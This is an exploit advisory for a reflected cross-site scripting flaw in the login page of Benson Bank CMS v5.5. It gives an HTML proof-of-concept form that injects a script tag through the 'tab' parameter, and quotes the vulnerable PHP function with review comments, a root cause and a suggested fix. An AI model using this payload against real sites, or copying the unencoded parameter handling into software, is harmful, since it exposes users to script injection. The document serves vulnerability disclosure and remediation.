*=============================================================|
| Exploit Title: Benson Bank CMS v 5.5 - 2015.09.09 Cross Site Scripting
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://topnew.net
|
| Download Link : http://downloads.sourceforge.net/sidu/bank55.zip
|
| Version : v 5.5 - 2015.09.09
|
| Tested on: Kali Linux
|
| Date: 1/1/2017
*=============================================================|
| Exploit Code:
|
|<HTML>
|<HEAD><TITLE>Benson Bank CMS v 5.5 - 2015.09.09 Cross Site Scripting</TITLE></HEAD>
|<BODY>
|<form action="http://127.0.0.1/7/bank55/login.php" method="get">
| <input type="hidden" name="tab" value="Login'"/><ScRiPt >alert('M.R.S.L.Y')</ScRiPt>"/>
|</form>
|</BODY>
|</HTML>
*=======================|
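|Vulnerable code :
|
|Root cause: the "tab" request parameter arrives as $tab. The listing below shows
|no allow-list check and no HTML encoding before $tab is handed to nav1_guest(),
|whose body is not included here.
|Remediation: accept only the known tab names (Login, Apply, PWD, Change) and
|encode the value with htmlspecialchars() wherever it is printed.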
|
|function main($u, $p, $p1, $p2, $tab) { // handles logout/login, then prints the tabbed guest form; $tab selects the active tab
| if ($u == 'logout') {
| global $pin; // $pin is defined outside this listing
| $u = $pin[0];
| if ($u) { // the UPDATE below interpolates $u into SQL text; NOTE(review): confirm $pin[0] is always numeric
| cms_sql('update', 'bsb_account', null, null, "sid='$u.$u',updated='".date('Y-m-d H:i:s')."' where pid=$u");
| setcookie('BSB', '', time() - 1); // expiry in the past, so the browser discards the BSB cookie
| }
| }
| $u = ceil($u); $p = trim($p); // $u is forced to a number; $p is only trimmed
| if ($u < 1) $u = ''; // values below 1 become '' (falsy)
| if ($tab == 'Login' && $u && $p) { // $tab is only compared here (loose ==), never normalised
| $err = valid_data_login($u, $p);
| if (!$err) return main_jump_login($u, $auto, $url); // NOTE(review): $auto and $url are not assigned anywhere in this function
| }
| uppe();
| $tabs = array('Login'=>lang(2505), 'Apply'=>lang(2507), 'PWD'=>lang(2506), 'Change'=>lang(2513));
| echo cms_form(), "<div style='max-width:400px;margin:0 auto'>";
| nav1_guest($tab); // NOTE(review): $tab is passed on as received, with no allow-list check or htmlspecialchars() visible before this call; nav1_guest() is not shown and is presumably where the value is reflected
| echo "<ul class='tab'>"; // the links printed below use $k, the fixed keys of $tabs, not the request value
| if (!$tab) $tab = 'Login'; // default is applied only after nav1_guest() has already received the raw value
| foreach ($tabs as $k => $v) echo ($k == $tab ? "<li class='on'>$v</li>" : "<li><a href='login.php?tab=$k'>$v</a></li>");
| echo "</ul><div class='tab'>";
| if ($tab == 'Login') main_form_login($u, $p, $err); // NOTE(review): $err is assigned only inside the login branch above, so it is undefined when that branch is skipped
| elseif ($tab == 'Apply') main_apply($u, $p, $p1);
| elseif ($tab == 'PWD') main_pwd($u);
| elseif ($tab == 'Change') main_change($u, $p, $p1, $p2);
| echo '</div></div></form>'; // a $tab value outside the four known names matches no branch; only this closing markup follows
| down();
| }
|
*=============================================================|
| Discovered By : M.R.S.L.Y
*=============================================================|